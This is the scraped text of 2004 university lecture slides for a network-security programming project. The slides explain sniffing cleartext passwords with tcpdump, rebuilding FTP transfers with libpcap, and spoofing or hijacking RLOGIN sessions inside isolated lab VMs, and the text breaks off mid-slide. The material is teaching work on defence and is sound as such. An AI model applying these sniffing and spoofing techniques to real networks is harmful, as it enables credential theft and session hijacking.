CS155: Computer and Network SecurityProject Overview and SetupProject OverviewGoals of the assignmentSetupSetup (2)Setup (3)Setup (4)Quick TCP/IP ReviewTCP/IP OverviewRelevant Network LayersCliffs Notes VersionTCP FlagsTCP Flags (2)Connection setupConnection terminationThe actual assignment (finally!)Phase 1: SniffingTcpdump optionsPhase 2: File EavesdroppingLibpcapWhat to doWhat to do (2)Phase 3: Packet InjectionAttacksLibnetSlide 27Slide 28What to do (3)WrapupCS155: Computer and Network SecurityProgramming Project 3 – Spring 2004Matt [email protected] Overview and SetupProject Overview1) Use standard network monitoring tools to examine different networking protocols2) Use a packet capture library to automatically intercept FTP transfers3) Write a program to perform an injection attack on the RLOGIN protocolGoals of the assignmentGet some hands-on networking experienceLearn how secure different protocols areLearn about common attacks on clear-text protocolsDON’T end up in jail Never test your code outside of the boxes environment!SetupYou are given three cow images corresponding to three separate machines on the networkClient, server, and attackerThere are a number of users on the client sending network requests to services on the serverThe attacker (you!) is trying to perform different attacks (the assignment) on the client and serverSetup (2)All three boxes are located on the same Ethernet hubEthernet is a broadcast mediumEvery machine sees every packet, regardless of address!Normally, packets not intended for a host are discarded by the network cardBut in promiscuous mode all packets are available!Client Attacker ServerSetup (3)To start up the boxes, follow these stepsxterm –e ./string &Make sure to use the copy of str ing included with the cow images!Otherwise the attacker will not be to see the network traffic.xterm –e [open|closed]box clientcow 10.64.64.64 &xterm –e [open|closed]box servercow 10.64.64.65 &xterm –e [open|closed]box attackcow 10.64.64.66 &You must use these exact IP addresses!Setup (4)You are NOT given an account on the client and server machinesIf you’re good you might get one soon!Once you have a password, you can remotely shutdown the client and server withssh [username]@[ipaddr] /sbin/haltWe installed halt as setuid-root (bad idea in general!)But until then, you won’t be able to do a clean shutdown on clientcow and servercowSo keep a backup of the original images to avoid fsckingQuick TCP/IP ReviewTCP/IP OverviewOn this assignment, we are only dealing with protocols that run over TCP/IPWe assume a basic knowledge on the level of packets and portsIf you’re not that comfortable with this, stop by office hoursRelevant Network LayersFrom http://www.erg.abdn.ac.uk/users/gorry/course/images/ftp-tcp-enet.gifCliffs Notes VersionEach TCP packet that you see is actually a TCP packet wrapped inside of an IP packet wrapped inside of an Ethernet packet.Ethernet HeaderIP HeaderTCP HeaderApplication DataTCP FlagsSynchronize flag [SYN]Used to initiate a TCP connection Acknowledgement flag [ACK]Used to confirm received dataFinish flag [FIN]Used to shut down the connectionTCP Flags (2)Push flag [PSH]Do not buffer data on receiver side – send directly to application levelUrgent flag [URG]Used to signify data with a higher priority than the other trafficI.e Ctrl+C interrupt during an FTP transferReset flag [RST]Tells receiver to tear down connection immediatelyConnection setup“Three-way handshake”From http://www.cs.colorado.edu/~tor/sadocs/tcpip/3way.pngConnection terminationEither side can initiate terminationNote that the first FIN packet may still contain data!From http://homepages.feis.herts.ac.uk/~cs2_sn2/sn2-img62.pngThe actual assignment (finally!)Phase 1: SniffingGoal: observe network traffic, learn about different protocolsAlso: gain access to client and server machines in order to make Phases 2 and 3 easier!Installed tools (must be run as root):TcpdumpOld faithful, just gives raw packet infoTetherealLike tcpdump, but with more smarts about protocolsTcpflowFocuses on the payload of the packetsGreat for examining application level data (i.e passwords)!Tcpdump optionsAll three network monitoring tools take similar command line optionsCan filter packets by address, port, protocol, length, TCP flags, etc.Make sure to read the tcpdump manpage closely!For your submission, we want you to list the options that you used to isolate the packets containing username/password information.Phase 2: File EavesdroppingManual packet sniffing is an interesting exercise, but programmatically capturing packets is much more powerfulIn this part of the assignment, you will write a program to reconstruct a sniffed FTP file transferLibpcapLibpcap is a packet capture library written in CIt allows you to write code to automate packet sniffing attacks.The library is fairly simple to usePseudocode:while (true) {packet = pcap_next();// do something with the packet}We give you starter code in /home/user/pp3/sniff.c on the attackcow image.What to doFigure out which packets correspond to an FTP file transferDetect when a transfer starts and create a local file to store the dataExtract data from packets and write them to the fileFigure out when the transfer completes, close the file, and exit the programWhat to do (2)The hard part is figuring out how to parse the various layers of headers.You can find the header definitions at:Ethernet: /usr/include/net/ethernet.hIP: /usr/include/netinet/ip.hTCP: /usr/include/netinet/tcp.hYou’ll also need to figure out how FTP data transfers workUsing the techniques you learned in Phase 1 might be more productive than poring over protocol docsPhase 3: Packet InjectionRLOGIN - allows remote login sessionVery similar to TelnetDoes not ask for password if the client machine is mentioned in /etc/hosts.equiv or ~/.rhosts(big convenience.... even bigger vulnerability)After authentication - the rest of the traffic is in the clear!Uses one TCP channel for communicationAttacksCan spoof an entire TCP connectionIf the spoofed sender is present in /etc/hosts.equiv or ~/.rhosts, server won't ask for passwordAlready established session can be hijacked by spurious
View Full Document